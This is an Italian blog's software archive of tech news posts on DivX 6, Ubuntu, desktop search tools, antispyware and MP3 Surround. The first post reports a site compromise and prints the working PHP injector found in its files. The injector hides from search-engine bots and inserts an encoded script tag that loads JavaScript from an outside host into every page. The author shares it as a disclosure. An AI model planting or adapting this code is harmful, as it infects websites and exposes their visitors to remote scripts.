Category Archives: Software

WTF ?

Mi distraggo per qualche giorno e mi ritrovo il blog compromesso. Pochi giorni dopo l’upgrade a 3.0 ? WTF ?

Tutti i file .php dell’installazione erano stati modificati, con all’inizio del file un bel

< ?eval(base64_decode("{very_long_base64_string}") ?>

Se qualcuno si vuole divertire, la parte iniziale del codice di invocazione è:

if(function_exists(‘ob_start’)&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists(‘mrobh’)){ if(!function_exists(‘gml’)){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],”googlebot”)&& (!stristr($_SERVER["HTTP_USER_AGENT"],”yahoo”))){ return base64_decode(“PHNjcmlwdCBzcmM9Imh0dHA6Ly9kb21haW5hbWVhdC5jYy9qczIucGhwIj48L3NjcmlwdD4=”); } return “”; } } if(!function_exists(‘gzdecode’)){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack(‘v’,substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header(‘Content-Encoding: none’); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match(‘/\< \/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si’,gml().”\n”.’$1′,$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start(‘mrobh’); } }

Update: ripubblicato dopo aver fatto pulizia più approfondita del sito.

DivX 6

Ho un po’ trascurato DivX 6, ma vedo che molti cercano notizie al riguardo. Novità:

  • Possibilità di creare menu, tracce audio multiple, sottotitoli, ecc;
  • Miglioramenti di qualità e di rapporto di compressione;
  • DivX Converter, una semplice interfaccia grafica drag & drop per la conversione di file video;
  • In arrivo nel prossimo futuro un nuovo codec (Helium, ora in beta) e supporto per surround sound.

Nel forum di Doom9.org maggiori particolari e commenti su DivX 6.

Fedora Core 4 test 2 e Ubuntu

E’ disponibile Fedora Core 4 Test 2. Consigliabile un mirror, o meglio ancora, scaricarla con Bittorrent.

Per quanto mi riguarda, ho appena installato Ubuntu 5.0.4, e per ora sono molto soddisfatto. Installazione quasi indolore, a parte essere stato inseguito da Parted con il coltello tra i denti, per avergli proposto una partizione estesa con un buco in mezzo, generato da qualche strumento di partizionamento “impuro” … L’installazione delle parti “non libere” del sistema è molto semplificata dall’esistenza della Unofficial Ubuntu 5.04 Starter Guide. Molto consigliata.

Yahoo Desktop Search ed altri

Finalmente disponibile al pubblico anche Yahoo! Desktop Search. Oltre 200 tipi di file indicizzati. Purtroppo, non solo è “windows only”, è XP/2000 only.

Su Yahoo Search Blog un pò di sano orgoglio per il tool di casa. Le doti vantate:

  • Ricerca incrementale (find-as-you-type), i risultati compaiono man mano che si scrivono i termini di ricerca;
  • Live preview per molti dei tipi di file supportati, in modo da essere costretti ad aprire le applicazioni per verificare le corrispondenze;
    1. Nel frattempo è arrivata la versione Mac di Blinkx.

      [Via John Battelle]

Windows AntiSpyware beta

Finalmente Microsoft si occupa attivamente del problema dello spyware per Windows: è disponibile la beta di Window AntiSpyware, il primo frutto dell’acquisizione di Giant Company Software dello scorso dicembre.

Sulla pagina di scaricamento compare anche una sezione in cui viene raccomandato di “validare” la propria installazione di Windows, per essere certi che sia legittima. Al momento questo passo è facoltativo ma raccomandato, per “avere accesso più rapidamente in futuro al Microsoft Download Center”. Ci si può aspettare che diventi obbligatorio in futuro.

Sono anche curioso di sapere se il servizio di aggiornamento di AntiSpyware rimarrà gratuito in futuro, o sarà necessario pagare un abbonamento.

Mozilla Lightning

Mozilla Lightning è il progetto per integrare in Thunderbird funzioni avanzate di gestione del calendario, prendedo come base il programma standalone Sunbird (che si avvicina alla release 0.2).

Questo progetto è destinato a tutti quegli utenti che vorrebbero migrare verso Thunderbird perchè è uno splendido programma per la posta elettronica, ma non possono rinunciare alle funzioni di calendario di Outlook. Soprattutto per quelli in ambienti enterprise.

Il progetto è ai primi passi, una prima release al pubblico è prevista per metà 2005.

[Via News.com]

Microsoft Desktop Search

Dò anch’io il mio contributo alla popolarità odierna della beta di MSN Toolbar Suite, annunciata ieri, che ha già accumulato oltre 160 link sui weblog in giro per il mondo.

La Toolbar Suite integra uno strumento di ricerca per i file all’interno del proprio PC, che ha come punto di forza l’integrazione con IE, MSN Messenger e Outlook. E la dis-integrazione con Firefox, Thunderbird, ecc., uno può immaginare, vista la scritta in rosso che avvisa della “mancanza di requisiti minimi” chi visiti la pagina web della Toolbar Suite con un browser open source.

Il dirigente di Microsoft che presenta la Toolbar Suite vanta anche il suo maggior rispetto per la privacy rispetto ai software rivali: non terrebbe memoria delle pagine web che l’utente visita. A mio parere questa è una scelta discutibile: la funzione di ricerca all’interno delle pagine web che si sono visitate potrebbe essere molto utile. Chi la vuole la dovrebbe poter usare, mentre chi ha paura che mamma/moglie/fidanzata scopra eventuali visite web imbarazzanti, se la disabiliti. Non tenere memoria delle visite web è la scelta facile.

Piuttosto, Microsoft potrebbe offrire un Private Explorer, che faciliti l’eliminazione delle tracce dal browser …

Yahoo Desktop Search – in arrivo

Yahoo! ha annunciato che a gennaio arriverà la risposta di Yahoo! a Google Desktop Search.

Yahoo! Desktop Search sarà basato sulla tecnologia sviluppata da X1, un altra delle start-up di Bill Gross di Idealab (che ha già venduto Overture a Yahoo!).

Il Financial Times si chiede come Google e Yahoo! pensano di guadagnare dal software di ricerca desktop, visto che viene dato via gratis. Penso che la risposta sia abbastanza semplice:

  • Fidelizzazione degli utenti
  • Possibilità di accrescere la rilevanza della pubblicità, aggiungendo valore sia per gli inserzionisti che per l’utente

YDS non è neanche il primo esempio di software “regalato” da parte di Yahoo! Anzi, c’è da chiedersi perchè Yahoo! Desktop Search non diventi una funzione aggiuntiva di Yahoo! Messenger.

Update: Una slide in cui Yahoo! vanta i modi in cui YDS è meglio di GDS:

  Yahoo Competizione
Pertinenza Possibilità di far pivotare i dati su ogni dimensione:
"freschezza", creatore, destinatario, tipo, ecc.
Ranking solo per data e pertinenza
Completezza Capacità di indicizzare oltre 225 tipi di dati, e allegati email 5 tipi di dati, allegati non indicizzati
Freschezza V1.0 Beta: Incrementale, ad intervalli prestabiliti
V1.0: quasi in tempo reale
Quasi in tempo reale
Presentazione Interfaccia utente nativa
Cerca-mentre-scrivi, anteprima, azioni post-ricerca
Limitata alla presentazione HTML

Si spera che l’interfaccia nativa di YDS non sia un ostacolo alla diffusione di altre piattaforme oltre a Windows (cui X1 è limitata).

Linux e Palm

Palm Source, l’azienda che produce il sistema operativo dei palmari Palm, ha acquistato China MobileSoft Limited, un’azienda cinese che produce un sistema operativo per cellulari e palmari basato su Linux.

Si specula che Palm abbia intenzione di basare future versioni di Palm OS su Linux, anche in risposta all’avanzata di Windows Mobile, che negli ultimi tempi ha superato Palm OS come sistema operativo più venduto per palmari.

[Via Engadget]

MP3 Surround

Finalmente arriva l’MP3 Surround.

L’Istituto Fraunhofer, Thomson e Agere Systems hanno sviluppato congiuntamente un formato che permette di codificare i 5.1 canali usati dai più popolari sistemi di codifica (Dolby Digital, DTS, etc), mantenendo la compatibilità con gli attuali decoder, che potranno leggere i file MP3 Surround ma, ovviamente, li riprodurranno solo in stereo. I file dovrebbero essere poco più grandi rispetto ad un MP3 stereo codificato allo stesso bitrate.

Attualmente la versione di valutazione dell’encoder offerta dal Fraunhofer Institut supporta la codifica a 5.1 canali (due diffusori frontali laterali, un frontale centrale, due surround e un subwoofer), ma il formato non è limitato a questa configurazione. Non ci sono limitazioni intrinseche al numero dei canali: future versioni di encoder e decoder potranno supportare i formati 7.1 o 10.2.

L’encoder di valutazione scade il 31 dicembre 2005 (continuerà a funzionare come decoder), ed è limitato ad un bitrate massimo di 192 kbps.

Speriamo che i creatori di MP3 Surround non siano troppo restrittivi nel concedere licenze per decoder/encoder gratuiti: il successo di MP3 rispetto ad altri formati è dovuto in gran parte alla iniziale diffusione di encoder e decoder gratuiti non autorizzati.

[Via Gizmodo]